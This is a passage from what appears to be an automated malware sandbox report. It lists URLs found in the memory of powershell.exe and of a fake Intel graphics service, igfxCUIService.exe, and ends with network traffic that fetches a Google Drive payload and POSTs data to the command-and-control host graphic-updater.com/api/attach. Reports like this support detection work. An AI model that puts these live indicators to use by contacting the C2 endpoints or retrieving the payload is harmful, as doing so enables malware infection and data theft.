00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000003.793364315.0000000007F16000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.793470514.0000000007F17000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.728563333.0000000000650000.00000004.00000040.sdmpString found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.729637199.0000000004701000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.819681378.0000000004D91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Onlysame-origin;
Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Persistent-AuthWWW-AuthenticateSec-Fetch-Dest
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocg5Eh
Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-2o-docs.googleusercontent.com/
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8
Source: igfxCUIService.exe, 00000020.00000002.956121777.0000000001438000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956103538.0000000001430000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000002.956196667.000000000146D000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
Source: igfxCUIService.exe, 00000020.00000002.956103538.0000000001430000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eumgr32.dll
Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.820903134.0000000005611000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://google.com/
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://google.com/a
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/
Source: igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/5
Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/C
Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/P
Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/Q
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/X
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attach
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attach/
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachM&dQ%
Source: igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachent.com
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachn5
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attacht.com
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachtent.com
Source: igfxCUIService.exe, 00000020.00000003.932634820.00000000014A2000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956443217.00000000014B8000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.916793791.000000000150B000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929400111.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req
Source: igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919317267.00000000014A2000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req2
Source: igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req7
Source: igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req8
Source: igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmpString found in binary or memory: https://graphic-updater.com/api/reqC
Source: igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqM
Source: igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqO
Source: igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqT
Source: igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqV
Source: igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqW
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqX
Source: igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqb
Source: igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqch
Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqd
Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqdll
Source: igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqdlli
Source: igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqj
Source: igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqm
Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqm64W%
Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqmj
Source: igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqmv1
Source: igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmpString found in binary or memory: https://graphic-updater.com/api/reqmx
Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmpString found in binary or memory: https://graphic-updater.com/api/reqo
Source: igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqs%qPG
Source: igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requ
Source: igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requrlencoded
Source: igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requrlencodedW%
Source: igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requrlencodedz%hPF
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/comD
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/e6
Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/ll
Source: igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/m6
Source: igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/om
Source: igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/om6
Source: igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/omX
Source: igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/u
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comB
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com_
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comcom5
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comcomV
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comomH
Source: igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmpString found in binary or memory: https://grc-0k-2o-docs.googleusercontent.com/%%doc-0k-2o-docs.googleusercontent.com
Source: powershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownHTTP traffic detected: POST /api/attach HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 136Host: graphic-updater.com
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: global trafficHTTP traffic detected: GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 0Host: drive.google.com
